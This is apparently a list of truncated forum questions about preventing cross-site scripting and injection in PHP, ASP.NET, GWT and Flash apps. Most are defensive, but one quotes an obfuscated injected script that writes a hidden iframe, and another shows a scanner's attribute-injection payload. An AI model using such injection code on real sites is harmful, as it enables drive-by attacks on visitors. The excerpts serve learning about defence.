i know the drill to find XSS and injection at sites made with javascript, php, java, mysql... Basically, I know how to write the bugs, so i know to find them. Now i'm evaluating a product which the frontend is flash. what are the common mistakes I should be looking? ...
Does asp.net have a built in mechanism that can sanitize all textbox input instead of redirecting to the error page? I have a textbox input where a user can enter a name, but if they try to enter and <> tags the page automatically throws an error. I just want to handle this error in a user friendly way. ...
In my web application I allow user generated content to be posted for public consumption similar to Stackoverflow. What is the best practice for handing this? My current steps for handling user generated content are: I use MarkItUp to allow users an easy way to format their html. After a user has submitted thier changes I run it thr...
I just ran across a question with an answer suggesting the AntiXss library to avoid cross site scripting. Sounded interesting, reading the msdn blog, it appears to just provide an HtmlEncode() method. But I already use HttpUtility.HtmlEncode(). Why would I want to use AntiXss.HtmlEncode over HttpUtility.HtmlEncode? Indeed, I am not the...
Is this regular expression enough to catch all cross site scripting attempts when embedding HTML into the DOM. eg: Such as with document.write() (javascript:|<\s*script.*?\s*>) It is referenced in this document from modsecurity.com http://www.modsecurity.org/documentation/Ajax%5FFingerprinting%5Fand%5FFiltering%5Fwith%5FModSecurity%5...
I have a requirement in Classic ASP, I am using a txtbox to store a numeric variable then i am passing it to next page to be passed to stored procedure. Now i am facing XSS issues so i want to encode the value of text box on parent page and then use it on the other page. I know the stored procedure will not run after getting the encode...
I'm currently in the process of developing a GWT 1.7.1 application that deals with a significant amount of persistent, user generated data so there is a risk of malicious XSS. One of the steps I am taking to prevent this is using org.apache.commons.lang.StringEscapeUtils.escapeHtml() server-side (Yes I am well aware that this will not pr...
I have an ASP.NET application that will display a Dataset's XML in a textbox when a button is clicked. Clicking the button again should rerun the request, but before this can happen I get an error saying 'A potentially dangerous Request.Form value was detected from the client (txtXML="<NewDataSet> ...)' Obviously, the angle brackets ar...
I have a website, and I just discoverd that somehow someone injected JavaScript on my page. How can I figure out what it does and how they did it? <script> var x = unescape("%68% (**** some other hex characters here ****%74%2e%63%6e%2f%76%69%64");document.write("<i"+"fr"+"am"+"e s"+"r"+"c=\""+x+"/ind"+"e"+"x.p"+"hp\" w"+"id"+"th=\"0\" ...
I have a Web application and have run a XSS scan on it and it reports that one of my pages that has a Java applet in it could potentially be open to XSS. The test managed to assign a javascript alert box to the following HTML code: <param name='id' value='' onMouseOver=alert(40041)> My question is - Is this a valid test? Will doing ...
Ok, so I have been reading about markdown here on SO and elsewhere and the steps between user-input and the db are usually given as convert markdown to html sanitize html (w/whitelist) insert into database but to me it makes more sense to do the following: sanitize markdown (remove all tags - no exceptions) convert to html insert ...
I have a form text field that accepts a url. When the form is submitted, I insert this field into the database with proper anti-sql-injection. My question though is about xss. This input field is a url and I need to display it again on the page. How do I protect it from xss on the way into the database (I think nothing is needed since ...
I've implemented a PDF generation function in my flex app using alivePDF, and I'm wondering if the process I've used to get the file to the user creates an XSS vulnerability. This is the process I'm currently using: Create the PDF in the flex application. Send the binary PDF file to the server using a POST, along with the filename to ...
I'm working on an app that would allow people to enter arbitrary URL's that would be included in <a href="ARBITRARY URL"> and <img src="ARBITRARY URL" /> tags. What type of security risks am I looking at? The app is coded in PHP, and the only security countermeasure I currently perform is using PHP's htmlentities() function against the...
Hi folks: We got a long-running website where XSS lurks. The problem comes from that some developers directly - without using HtmlEncode/Decode() - retrieve Request["sth"] to do the process, putting on the web. I wonder if there is any mechanism like HTTPModule to help us HtmlEncode() all the items in a Http request to avoid XSS to so...
In your experience, what have you found, worked on, or encountered in terms of site vulnerabilities? And what actions did you take to mitigate these issues? This may include XSS (cross site scripting), SQL Injection attacks, plain old DDOS or phishing attempts on your site's customers. Only yesterday I came across an entire section of ...
Anyone know if jsbin.com implements any protection for XSS or other javascript attacks? I see jsbin links used fairly regularly on sites like this one and I can't find any indication from the site one way or another. If it does implement counter measures, what kinds of things does it block out. If not, I should probably be more carefu...
I'm building a webpart for a Sharepoint site that allows the user to enter information into a textbox that will eventually be showed to other users. The problem is that I need to allow simple formatting (bold, italic etc) and also allow the user to enter an url (a <a href=".....). I don't want to expose a XSS exploit since I do not trust...
We have a business partner that is IFRAMEing some data to one of our web pages. I would like to limit his JS abilities to interact only inside of the IFRAME as well as his PHP abilities. Is this something that is setup automatically or do I have to make sure that these capabilities are assigned somewhere. Thanks for the help. ...
Note: I'm using Zend Framework, but I think most of this applies to PHP coding in general. I'm trying to choose a strategy for writing views scripts, possibly with the help of a templating engine. Motivations: clarity and security. I'm just not happy with writing .phtml scripts. This syntax is awfully verbose to do the most often needed...